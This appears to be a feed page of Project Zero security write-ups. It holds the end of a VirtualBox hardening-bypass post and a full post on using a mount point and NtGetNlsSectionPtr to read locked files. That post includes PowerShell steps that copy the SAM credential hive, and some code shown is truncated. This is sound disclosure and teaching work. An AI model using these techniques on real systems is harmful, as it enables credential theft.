The main check for the Owner is in supHardenedWinVerifyImageByLdrMod. Almost the first thing that function does is call supHardNtViCheckIsOwnedByTrustedInstallerOrSimilar which we saw earlier. However as the comments above the check indicate the code will also allow files under System32 and WinSxS directories to not be owned by TrustedInstaller. This is a bus sized hole in the point of the check, as all we need is one writeable directory under System32. We can find some by running the Get-AccessibleFile cmdlet in my NtObjectManager PS module.

There are plenty to choose from, we’ll just pick the Tasks folder as it’s guaranteed to always be there. So the exploit should be as follows:
  1. Copy a signed binary to %SystemRoot%\System32\Tasks\Dummy\ABC
  2. Copy an unsigned binary to %SystemRoot%\System32\Tasks\Dummy\ABC.DLL
  3. Register a COM hijack pointing the in-process server to the signed file path from 1.

If you try to start a Virtual Machine you’ll find that this trick works. The hardening code checks the ABC file for the signature, but LdrLoadDll ends up loading ABC.DLL. Just to check we didn’t just exploit something else let’s check the hardening log:
\..\Tasks\dummy\ABC: Owner is not trusted installer\..\Tasks\dummy\ABC: Relaxing the TrustedInstaller requirement for this DLL (it's in system32).
supHardenedWinVerifyImageByHandle: -> 0 (\..\Tasks\dummy\ABC)supR3HardenedMonitor_LdrLoadDll: pName=c:\..\tasks\dummy\ABC [calling]
The first two lines indicate the bypass of the Owner check as we expected. The second two indicate it’s verified the ABC file and therefore will call the original LdrLoadDll, which ultimately will append the extension and try to load ABC.DLL instead. But, wait, how come the other checks in NtCreateSection and the loader callback don’t catch loading a completely different file? Let’s search for any instance of ABC.DLL in the rest of the hardening log to find out:
\..\Tasks\dummy\ABC.dll: Owner is not trusted installer \..\Tasks\dummy\ABC.dll: Relaxing the TrustedInstaller requirement for this DLL (it's in system32).supHardenedWinVerifyImageByHandle: -> 22900 (\..\Tasks\dummy\ABC.dll)supR3HardenedWinVerifyCacheInsert: \..\Tasks\dummy\ABC.dllsupR3HardenedDllNotificationCallback:  c:\..\tasks\dummy\ABC.DLL supR3HardenedScreenImage/LdrLoadDll: cache hit (Unknown Status 22900) on \...\Tasks\dummy\ABC.dll
Again the first two lines indicate we bypassed the Owner check because of our file's location. The next line, supHardenedWinVerifyImageByHandle is more interesting however. This function verifies the image file. If you look back in this blog at the earlier log of this check you’ll find it returned the result -22900, which was considered an error. However in this case it’s returning 22900, which as VBOX is treating any result >= 0 as success the hardening code gets confused and assumes that the file is valid. The negative error code is VERR_LDRVI_NOT_SIGNED in the source code, whereas the positive “success” code is VINF_LDRVI_NOT_SIGNED.
This seems to be a bug in the verification code when calling code in the DLL Loader Lock, such as in the NtCreateSection hook. The code can’t call WinVerifyTrust in case it tries to load another DLL, which would cause a deadlock. What would normally happen is VINF_LDRVI_NOT_SIGNED is returned from the internal signature checking implementation. That implementation can only handle files with embedded signatures, so if a file isn’t signed it returns that information code to get the verification code to check if the file is catalog signed. What’s supposed to happen is WinVerifyTrust is called and if the file is still not signed it returns the error code, however as WinVerifyTrust can’t be called due to the lock the information code gets propagated to the caller which assumed it’s a success code.
The final question is why the final Loader Callback doesn’t catch the unsigned file? VBOX implements a signed file cache based on the path to avoid checking a file multiple times. When the call to supHardenedWinVerifyImageByHandle was taken to be a success the verifier called supR3HardenedWinVerifyCacheInsert to add a cache entry for this path with the “success” code. We can see that in the Loader Callback it tries to verify the file but gets back a “success” code from the cache so assumes everything's okay, and the loading process is allowed to complete.
Quite a complex set of interactions to get code running. How did Oracle fix this issue? They just add the DLL extension if there’s no extension present. They also handle the case where the filename has a trailing period (which would be removed when loading the DLL).Exploiting Kernel-Mode Image Loading BehaviorThe final bug I’m going to describe was fixed as CVE-2017-10129 in VBOX version 5.1.24. This isn’t really a bug in VBOX as much as it’s an unexpected behavior in Windows.
Through all this it’s worth noting that there’s an implicit race condition in what the hardening code is trying to do, specifically if you could change the file between the verification point and the point where the file is mapped. In theory you could do this to VBOX but the timing window is somewhat short. You could use OPLOCKs and the like but it’s a bit of a pain, instead it’d be nice to get the TOCTOU attack for free.
Let’s look at how image files are handled in the kernel. Mapping an image file on Windows is expensive, the OS doesn’t use position independent code and so can’t just map the DLL into memory as a simple file. Instead the DLL must be relocated to a specific memory address. This requires modifying pages of the DLL file to ensure any pointers are correctly fixed up. This is even more important when you bring ASLR into the mix as ASLR will almost always force a DLL to be relocated from its base address. Therefore, Windows caches an instance of an image mapping whenever it can, this is why the load address of a DLL doesn’t change between processes on the same system, it’s using the same cached image section.
The caching is actually in part under control of the filesystem driver. When a file is opened the IO manager will allocate a new instance of the FILE_OBJECT structure and pass it to the IRP_MJ_CREATE handler for the driver. One of the fields that the driver can then initialize is the SectionObjectPointer. This is an instance of the SECTION_OBJECT_POINTERS structure, which looks like the following:
 PVOID DataSectionObject;
 PVOID SharedCacheMap;
 PVOID ImageSectionObject;
The fields themselves are managed by the Cache manager, but the structure itself must be allocated by the File System driver. Specifically the allocation should be one per-file in the filesystem; while each open instance of a specific file will have unique FILE_OBJECT instances the SectionObjectPointer should be the same. This allows the Cache manager to fill in the different fields and then reuse them if another instance of the same file tries to be mapped.
The important field here is ImageSectionObject which contains the cached data for the mapped image section. I’m not going to delve into detail of what the ImageSectionObject pointer contains as it’s not really relevant. The important thing is if the SectionObjectPointer and by extension the ImageSectionObject pointers are the same for a FILE_OBJECT instance then mapping that file as an image will map the same cached image mapping. However, as ImageSectionObject pointer is not used when reading from a file it doesn’t follow that what’s actually cached still matches what’s on disk.
Trying to desynchronize the file data from the SectionObjectPointer seems to be pretty tricky with an NTFS volume, at least without administrator privileges. One scenario where you can do this desynchronization is via the SMB redirector when accessing network shares. The reason is pretty simple, it’s the local redirector’s responsibility to allocate the SectionObjectPointer structure when a file is opened on a remote server. As far as the the redirector’s concerned if it opens the file \Share\File.dll on a server twice then it’s the same file. There’s no real other information the redirector can use to verify the identity of the file, it has to guess. Any property you can think of, Object ID, Modification Time can just be a lie. You could easily modify a copy of SAMBA to do this lying for you. The redirector also can’t lock the file and ensure it stays locked. So it seems the redirector just doesn’t bother with any of it, if it looks like the same file from its perspective it assumes it’s fine.
However this is only for the SectionObjectPointer, if the caller wants to read the contents of the file the SMB redirector will go out to the server and try to read the current state of the file. Again this could all be lies, and the server could return any data it likes. This is how we can create a desynchronization; if we map an image file from a SMB server, change the underlying file data then reopen the file and map the image again the mapped image will be the cached one, but any data read from the file will be what’s current on the server. This way we can map an untrusted DLL first, then replace the file data with a signed, valid file (SMB supports reading the owner of the file, so we can spoof TrustedInstaller), when VBOX tries to load it it will verify the signed file but map the cached untrusted image and it will never know.
Having a remote server isn’t ideal, however we can do everything we need by using the local loopback SMB server and access files via the admin shares. Contrary to their names admin shares are not limited to administrators if you’re coming from localhost. The key to getting this to work is to use a Directory Junction. Junctions are resolved on the server, the redirector client knows nothing about them. Therefore as far as the client is concerned if it opens the file \\localhost\c$\Dir\File.dll once, then reopens the same file these could be two completely different files as shown in the following diagram:

Fortunately, one thing which should be evident from the previous two issues is that VBOX’s hardening code doesn’t really care where the DLL is located as long as it meets its two criteria, it’s owned by TrustedInstaller and it’s signed. We can point the COM hijack to a SMB share on the local system. Therefore we can perform the attack as follows:
  1. Set up a junction on the C: drive pointing at a directory containing our untrusted file.
  2. Map the file via the junction over the c$ admin share using LoadLibrary, do not release the mapping until the exploit is complete.
  3. Change the junction to point to another directory with a valid, signed file with the same name as our untrusted file.
  4. Start VBOX with the COM hijack pointing at the file. VBOX will read the file and verify it’s signed and owned by TrustedInstaller, however when it maps it the cached, untrusted image section will be used instead.

So how did Oracle fix this? They now check that the mapped file isn’t on a network share by comparing the path against the prefix \Device\Mup. Conclusions
The implementation of process hardening in VirtualBox is complex and because of that it is quite error prone. I’m sure there are other ways of bypassing the protection, it just requires people to go looking. Of course none of this would be necessary if they didn’t need to protect access to the VirtualBox kernel driver from malicious use, but that’s a design decision that’s probably going to be difficult to fix in the short term.
Categories: Security

Windows Exploitation Tricks: Arbitrary Directory Creation to Arbitrary File Read

Google Project Zero - Tue, 08/08/2017 - 12:17
Posted by James Forshaw, Project Zero
For the past couple of months I’ve been presenting my “Introduction to Windows Logical Privilege Escalation Workshop” at a few conferences. The restriction of a 2 hour slot fails to do the topic justice and some interesting tips and tricks I would like to present have to be cut out. So as the likelihood of a full training course any time soon is pretty low, I thought I’d put together an irregular series of blog posts which detail small, self contained exploitation tricks which you can put to use if you find similar security vulnerabilities in Windows.
In this post I’m going to give a technique to go from an arbitrary directory creation vulnerability to arbitrary file read. Arbitrary direction creation vulnerabilities do exist - for example, here’s one that was in the Linux subsystem - but it’s not always obvious how you’d exploit such a bug in contrast to arbitrary file creation where a DLL is dropped somewhere. You could abuse DLL Redirection support where you create a directory calling program.exe.local to do DLL planting but that’s not always reliable as you’ll only be able to redirect DLLs not in the same directory (such as System32) and only ones which would normally go via Side-by-Side DLL loading.
For this blog we’ll use my example driver from the Workshop which already contains a vulnerable directory creation bug, and we’ll write a Powershell script to exploit it using my NtObjectManager module. The technique I’m going to describe isn’t a vulnerability, but it’s something you can use if you have a separate directory creation bug.Quick Background on the Vulnerability ClassWhen dealing with files from the Win32 API you’ve got two functions, CreateFile and CreateDirectory. It would make sense that there’s a separation between the two operations. However at the Native API level there’s only ZwCreateFile, the way the kernel separates files and directories is by passing either FILE_DIRECTORY_FILE or FILE_NON_DIRECTORY_FILE to the CreateOptions parameter when calling ZwCreateFile. Why the system call is for creating a file and yet the flags are named as if Directories are the main file type I’ve no idea.
A very simple vulnerable example you might see in a kernel driver looks like the following:
NTSTATUS KernelCreateDirectory(PHANDLE Handle,                               PUNICODE_STRING Path) {
 IO_STATUS_BLOCK io_status = { 0 };
 OBJECT_ATTRIBUTES obj_attr = { 0 };

 InitializeObjectAttributes(&obj_attr, Path,
 return ZwCreateFile(Handle, MAXIMUM_ALLOWED,                      &obj_attr, &io_status,
                     NULL, FILE_ATTRIBUTE_NORMAL,                     FILE_SHARE_READ | FILE_SHARE_DELETE,
                    FILE_OPEN_IF, FILE_DIRECTORY_FILE, NULL, 0);
There’s three important things to note about this code that determines whether it’s a vulnerable directory creation vulnerability. Firstly it’s passing FILE_DIRECTORY_FILE to CreateOptions which means it’s going to create a directory. Second it’s passing as the Disposition parameter FILE_OPEN_IF. This means the directory will be created if it doesn’t exist, or opened if it does. And thirdly, and perhaps most importantly, the driver is calling a Zw function, which means that the call to create the directory will default to running with kernel permissions which disables all access checks. The way to guard against this would be to pass the OBJ_FORCE_ACCESS_CHECK attribute flag in the OBJECT_ATTRIBUTES, however we can see with the flags passed to InitializeObjectAttributes the flag is not being set in this case.
Just from this snippet of code we don’t know where the destination path is coming from, it could be from the user or it could be fixed. As long as this code is running in the context of the current process (or is impersonating your user account) it doesn’t really matter. Why is running in the current user’s context so important? It ensures that when the directory is created the owner of that resource is the current user which means you can modify the Security Descriptor to give you full access to the directory. In many cases even this isn’t necessary as many of the system directories have a CREATOR OWNER access control entry which ensures that the owner gets full access immediately. Creating an Arbitrary DirectoryIf you want to follow along you’ll need to setup a Windows 10 VM (doesn’t matter if it’s 32 or 64 bit) and follow the details in setup.txt from the zip file containing my Workshop driver. Then you’ll need to install the NtObjectManager Powershell Module. It’s available on the Powershell Gallery, which is an online module repository so follow the details there. Assuming that’s all done, let’s get to work. First let’s look how we can call the vulnerable code in the driver. The driver exposes a Device Object to the user with the name \Device\WorkshopDriver (we can see the setup in the source code). All “vulnerabilities” are then exercised by sending Device IO Control requests to the device object. The code for the IO Control handling is in device_control.c and we’re specifically interested in the dispatch. The code ControlCreateDir is the one we’re looking for, it takes the input data from the user and uses that as an unchecked UNICODE_STRING to pass to the code to create the directory. If we look up the code to create the IOCTL number we find ControlCreateDir is 2, so let’s use the following PS code to create an arbitrary directory.
Import-Module NtObjectManager

# Get an IOCTL for the workshop driver.
function Get-DriverIoCtl {
       0x800 -bor $ControlCode, "Buffered", "Any")

function New-Directory {
 # Open the device driver.
 Use-NtObject($file = Get-NtFile \Device\WorkshopDriver) {
   # Get IOCTL for ControlCreateDir (2)
   $ioctl = Get-DriverIoCtl -ControlCode 2
   # Convert DOS filename to NT
   $nt_filename = [NtApiDotNet.NtFileUtils]::DosFileNameToNt($Filename)
   $bytes = [Text.Encoding]::Unicode.GetBytes($nt_filename)
   $file.DeviceIoControl($ioctl, $bytes, 0) | Out-Null
The New-Directory function first opens the device object, converts the path to a native NT format as an array of bytes and calls the DeviceIoControl function on the device. We could just pass an integer value for control code but the NT API libraries I wrote have an NtIoControlCode type to pack up the values for you. Let’s try it and see if it works to create the directory c:\windows\abc.

It works and we’ve successfully created the arbitrary directory. Just to check we use Get-Acl to get the Security Descriptor of the directory and we can see that the owner is the ‘user’ account which means we can get full access to the directory.Now the problem is what to do with this ability? There’s no doubt some system service which might look up in a list of directories for an executable to run or a configuration file to parse. But it’d be nice not to rely on something like that. As the title suggested instead we’ll convert this into an arbitrary file read, how might do we go about doing that?Mount Point AbuseIf you’ve watched my talk on Abusing Windows Symbolic Links you’ll know how NTFS mount points (or sometimes Junctions) work. The $REPARSE_POINT NTFS attribute is stored with the Directory which the NTFS driver reads when opening a directory. The attribute contains an alternative native NT object manager path to the destination of the symbolic link which is passed back to the IO manager to continue processing. This allows the Mount Point to work between different volumes, but it does have one interesting consequence. Specifically the path doesn’t have to actually to point to another directory, what if we give it a path to a file?
If you use the Win32 APIs it will fail and if you use the NT apis directly you’ll find you end up in a weird paradox. If you try and open the mount point as a file the error will say it’s a directory, and if you instead try to open as a directory it will tell you it’s really a file. Turns out if you don’t specify either FILE_DIRECTORY_FILE or FILE_NON_DIRECTORY_FILE then the NTFS driver will pass its checks and the mount point can actually redirect to a file.
Perhaps we can find some system service which will open our file without any of these flags (if you pass FILE_FLAG_BACKUP_SEMANTICS to CreateFile this will also remove all flags) and ideally get the service to read and return the file data?National Language SupportWindows supports many different languages, and in order to support non-unicode encodings still supports Code Pages. A lot is exposed through the National Language Support (NLS) libraries, and you’d assume that the libraries run entirely in user mode but if you look at the kernel you’ll find a few system calls here and there to support NLS. The one of most interest to this blog is the NtGetNlsSectionPtr system call. This system call maps code page files from the System32 directory into a process’ memory where the libraries can access the code page data. It’s not entirely clear why it needs to be in kernel mode, perhaps it’s just to make the sections shareable between all processes on the same machine. Let’s look at a simplified version of the code, it’s not a very big function:
NTSTATUS NtGetNlsSectionPtr(DWORD NlsType,                            DWORD CodePage,
                           PVOID *SectionPointer,                            PULONG SectionSize) {
 UNICODE_STRING section_name;
 OBJECT_ATTRIBUTES section_obj_attr;
 HANDLE section_handle;
 RtlpInitNlsSectionName(NlsType, CodePage, &section_name);
 InitializeObjectAttributes(&section_obj_attr,                             &section_name,
                            OBJ_KERNEL_HANDLE |                             OBJ_OPENIF |                             OBJ_CASE_INSENSITIVE |                             OBJ_PERMANENT);
 // Open section under \NLS directory.
 if (!NT_SUCCESS(ZwOpenSection(&section_handle,                         SECTION_MAP_READ,                         &section_obj_attr))) {
   // If no section then open the corresponding file and create section.
   UNICODE_STRING file_name;    OBJECT_ATTRIBUTES obj_attr;
   HANDLE file_handle;
   RtlpInitNlsFileName(NlsType,                        CodePage,                        &file_name);
   InitializeObjectAttributes(&obj_attr,                               &file_name,
                              OBJ_KERNEL_HANDLE |                               OBJ_CASE_INSENSITIVE);
   ZwOpenFile(&file_handle, SYNCHRONIZE,               &obj_attr, FILE_SHARE_READ, 0);
   ZwCreateSection(&section_handle, FILE_MAP_READ,                    &section_obj_attr, NULL,                    PROTECT_READ_ONLY, MEM_COMMIT, file_handle);

 // Map section into memory and return pointer.
 NTSTATUS status = MmMapViewOfSection(                      section_handle,
 return status;
The first thing to note here is it tries to open a named section object under the \NLS directory using a name generated from the CodePage parameter. To get an idea what that name looks like we’ll just list that directory:

The named sections are of the form NlsSectionCP<NUM> where NUM is the number of the code page to map. You’ll also notice there’s a section for a normalization data set. Which file gets mapped depends on the first NlsType parameter, we don’t care about normalization for the moment. If the section object isn’t found the code builds a file path to the code page file, opens it with ZwOpenFile and then calls ZwCreateSection to create a read-only named section object. Finally the section is mapped into memory and returned to the caller.
There’s two important things to note here, first the OBJ_FORCE_ACCESS_CHECK flag is not being set for the open call. This means the call will open any file even if the caller doesn’t have access to it. And most importantly the final parameter of ZwOpenFile is 0, this means neither FILE_DIRECTORY_FILE or FILE_NON_DIRECTORY_FILE is being set. Not setting these flags will result in our desired condition, the open call will follow the mount point redirection to a file and not generate an error. What is the file path set to? We can just disassemble RtlpInitNlsFileName to find out:
void RtlpInitNlsFileName(DWORD NlsType,                         DWORD CodePage,                         PUNICODE_STRING String) {
 if (NlsType == NLS_CODEPAGE) {
    RtlStringCchPrintfW(String,              L"\\SystemRoot\\System32\\c_%.3d.nls", CodePage);
 } else {
    // Get normalization path from registry.
    // NOTE about how this is arbitrary registry write to file.
The file is of the form c_<NUM>.nls under the System32 directory. Note that it uses the special symbolic link \SystemRoot which points to the Windows directory using a device path format. This prevents this code from being abused by redirecting drive letters and making it an actual vulnerability. Also note that if the normalization path is requested the information is read out from a machine registry key, so if you have an arbitrary registry value writing vulnerability you might be able to exploit this system call to get another arbitrary read, but that’s for the interested reader to investigate.
I think it’s clear now what we have to do, create a directory in System32 with the name c_<NUM>.nls, set its reparse data to point to an arbitrary file then use the NLS system call to open and map the file. Choosing a code page number is easy, 1337 is unused. But what file should we read? A common file to read is the SAM registry hive which contains logon information for local users. However access to the SAM file is usually blocked as it’s not sharable and even just opening for read access as an administrator will fail with a sharing violation. There’s of course a number of ways you can get around this, you can use the registry backup functions (but that needs admin rights) or we can pull an old copy of the SAM from a Volume Shadow Copy (which isn’t on by default on Windows 10). So perhaps let’s forget about… no wait we’re in luck.
File sharing on Windows files depends on the access being requested. For example if the caller requests Read access but the file is not shared for read access then it fails. However it’s possible to open a file for certain non-content rights, such as reading the security descriptor or synchronizing on the file object, rights which are not considered when checking the existing file sharing settings. If you look back at the code for NtGetNlsSectionPtr you’ll notice the only access right being requested for the file is SYNCHRONIZE and so will always allow the file to be opened even if locked with no sharing access.
But how can that work? Doesn’t ZwCreateSection need a readable file handle to do the read-only file mapping. Yes and no. Windows file objects do not really care whether a file is readable or writable. Access rights are associated with the handle created when the file is opened. When you call ZwCreateSection from user-mode the call eventually tries to convert the handle to a pointer to the file object. For that to occur the caller must specify what access rights need to be on the handle for it to succeed, for a read-only mapping the kernel requests the handle has Read Data access. However just as with access checking with files if the kernel calls ZwCreateSection access checking is disabled including when converting a file handle to the file object pointer. This results in ZwCreateSection succeeding even though the file handle only has SYNCHRONIZE access. Which means we can open any file on the system regardless of it’s sharing mode and that includes the SAM file.
So let’s put the final touches to this, we create the directory \SystemRoot\System32\c_1337.nls and convert it to a mount point which redirects to \SystemRoot\System32\config\SAM. Then we call NtGetNlsSectionPtr requesting code page 1337, which creates the section and returns us a pointer to it. Finally we just copy out the mapped file memory into a new file and we’re done.
$dir = "\SystemRoot\system32\c_1337.nls"
New-Directory $dir
$target_path = "\SystemRoot\system32\config\SAM"
Use-NtObject($file = Get-NtFile $dir `             -Options OpenReparsePoint,DirectoryFile) {
 $file.SetMountPoint($target_path, $target_path)

Use-NtObject($map =     [NtApiDotNet.NtLocale]::GetNlsSectionPtr("CodePage", 1337)) {
 Use-NtObject($output = [IO.File]::OpenWrite("sam.bin")) {
   Write-Host "Copied file"
Loading the created file in a hex editor shows we did indeed steal the SAM file.

For completeness we’ll clean up our mess. We can just delete the directory by opening the directory file with the Delete On Close flag and then closing the file (making sure to open it as a reparse point otherwise you’ll try and open the SAM again). For the section as the object was created in our security context (just like the directory) and there was no explicit security descriptor then we can open it for DELETE access and call ZwMakeTemporaryObject to remove the permanent reference count set by the original creator with the OBJ_PERMANENT flag.
Use-NtObject($sect = Get-NtSection \nls\NlsSectionCP1337 `
                   -Access Delete) {
 # Delete permanent object.
}Wrap-UpWhat I’ve described in this blog post is not a vulnerability, although certainly the code doesn’t seem to follow best practice. It’s a system call which hasn’t changed since at least Windows 7 so if you find yourself with an arbitrary directory creation vulnerability you should be able to use this trick to read any file on the system regardless of whether it’s already open or shared. I’ve put the final script on GITHUB at this link if you want the final version to get a better understanding of how it works.
It’s worth keeping a log of any unusual behaviours when you’re reverse engineering a product in case it becomes useful as I did in this case. Many times I’ve found code which isn’t itself a vulnerability but have has some useful properties which allow you to build out exploitation chains.
Categories: Security
Subscribe to aggregator - Security